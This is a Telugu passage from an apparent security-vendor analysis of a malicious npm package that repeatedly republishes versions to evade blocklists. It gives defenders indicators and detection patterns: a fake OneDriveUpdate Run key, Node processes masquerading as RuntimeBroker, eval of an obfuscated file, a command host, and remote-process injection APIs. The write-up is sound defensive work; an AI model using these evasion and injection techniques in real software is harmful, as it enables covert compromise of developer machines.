డెబ్బై వెర్షన్ల మార్పు అనేది గమనించదగిన ఒక ధోరణి. కొన్ని రోజుల్లోనే ఒకే ప్యాకేజీని డజన్ల కొద్దీ సార్లు తిరిగి ప్రచురించడం, అందులోనూ ఇప్పటికే తొలగించిన వెర్షన్ల కంటే తక్కువ వెర్షన్ నంబర్లను తిరిగి చేర్చడం వల్ల, తొలగింపుల మధ్య కూడా రిజిస్ట్రీలో ఒక లైవ్ కాపీ ఉంటుంది మరియు ఇది వెర్షన్‌కు పిన్ చేసిన బ్లాక్‌లిస్ట్‌లకు ఆటంకం కలిగిస్తుంది. sensivity@2.5.61 కోసం ఉన్న ఒక బ్లాక్‌లిస్ట్ ఎంట్రీ, మరుసటి రోజు తిరిగి ప్రచురించబడిన sensivity@2.5.3 పై ఎలాంటి ప్రభావం చూపదు.

రక్షకులు ఈ క్రింది వాటిపై చర్య తీసుకోవచ్చు:

  • రిజిస్ట్రీ-ప్రాక్సీ మరియు CI అనుమతి జాబితాలలో ప్యాకేజీ పేరు సున్నితత్వాన్ని పూర్తిగా నిరోధించండి. వ్యక్తిగత వెర్షన్‌లను పిన్ చేయడం పునఃప్రచురణ క్రమానికి లొంగిపోతుంది; పేరే శాశ్వత సూచిక.
  • ప్రతి-వినియోగదారు మార్గంలోని .vbs ఫైల్‌పై wscript.exeను అమలు చేసే OneDriveUpdate అనే పేరు గల రన్ విలువ కోసం వెతకండి. అసలైన OneDrive అప్‌డేటర్ ఈ విధంగా నమోదు చేయబడదు.
  • Node.js ప్రాసెస్‌పై హెచ్చరిక, దీని ప్రాసెస్ టైటిల్ 'రన్‌టైమ్ బ్రోకర్'గా ఉంది. అసలైన బ్రోకర్ RuntimeBroker.exe, అంతేగాని Node రన్‌టైమ్ కాదు.
  • కంపైల్ చేయబడిన .node యాడ్ఆన్‌తో పాటు, దాని పక్కనే ఉన్న .obf.js ఫైల్ యొక్క eval(fs.readFileSync(…))ను కూడా అందించే ప్యాకేజీలను npm install-timeలో ఫెచ్ చేయడాన్ని ఫ్లాగ్ చేయండి. అస్పష్టమైన నేటివ్ బైనరీ పక్కన అస్పష్టంగా మార్చబడిన టెక్స్ట్ పేలోడ్ లోడ్ అవ్వడమే ఇక్కడి నిర్మాణపరమైన సూచన, ఇది ఏ స్ట్రింగ్ IOCతో సంబంధం లేకుండా ఉంటుంది.
  • నిర్వహించబడే విండోస్ ఎండ్‌పాయింట్‌లలో, ఊహించని నోడ్ ప్రాసెస్ ద్వారా పోర్ట్ 3000లో ప్రారంభించబడిన ఏదైనా స్థానికంగా బౌండ్ చేయబడిన లిజనర్‌ను అనుమానాస్పదంగా పరిగణించండి.
  • డెవలపర్ లేదా తుది-వినియోగదారు హోస్ట్‌ల నుండి izopi.comకు వెళ్లే అభ్యర్థనలను నిరోధించండి లేదా హెచ్చరించండి; ఇది ప్యాకేజీ యొక్క ఏకైక బాహ్య ఎండ్‌పాయింట్, దీనిని అస్పష్ట సర్వర్ నుండి /check.php వద్ద చేరుకోవచ్చు.
  • బండిల్ చేయబడిన ఏ .node యాడ్ఆన్‌నైనా విశ్వసించే ముందు, దాని ఇంపోర్ట్ టేబుల్‌ను తనిఖీ చేయండి. ప్యాకేజీ ఏమి చేస్తుందని చెప్పుకున్నప్పటికీ, OpenProcess + VirtualAllocEx + WriteProcessMemory + CreateRemoteThread అనే ఈ కలయిక రిమోట్-ప్రాసెస్ ఇంజెక్షన్ అవుతుంది; ఇక్కడ ఇది ఒక Direct3D ఓవర్‌లే మరియు aimbot/ESP/triggerbot స్ట్రింగ్‌ల పక్కన ఉంటుంది.

స్థిర-విశ్లేషణ కోసం pipelineవెర్షన్ మార్పులన్నింటిలోనూ ఈ నిర్ధారణ రూపం స్థిరంగా ఉంటుంది: నెట్‌వర్క్-యేతర ఇన్‌స్టాల్ ప్రొఫైల్, తెలిసిన సిస్టమ్-ప్రాసెస్ పేరుకు ప్రాసెస్-టైటిల్ కేటాయింపు, పవర్‌షెల్ ద్వారా రన్-కీ రైట్, మరియు డిస్క్ నుండి చదివిన ఫైల్ యొక్క ఇవాల్యుయేషన్. వీటిలో ఏవీ డొమైన్, IP, లేదా తదుపరి రీపబ్లిష్ ద్వారా తొలగించబడే వెర్షన్ నంబర్‌పై ఆధారపడవు.

 ప్రస్తావనలు

[npm: సున్నితత్వం] – ఇక్కడ చర్చించిన ప్యాకేజీ వెర్షన్ లైన్ కోసం రిజిస్ట్రీ పేజీ; తొలగింపుకు లోబడి ఉంటుంది.

sca-tools-software-composition-analysis-tools
మీ సాఫ్ట్‌వేర్ ప్రమాదాలకు ప్రాధాన్యత ఇవ్వండి, వాటిని పరిష్కరించండి మరియు సురక్షితం చేయండి.
మీ ఉచిత ఖాతాను పొందండి.
క్రెడిట్ కార్డ్ అవసరం లేదు.

మీ సాఫ్ట్‌వేర్ అభివృద్ధి మరియు డెలివరీని సురక్షితం చేసుకోండి

Xygeni ఉత్పత్తి శ్రేణితో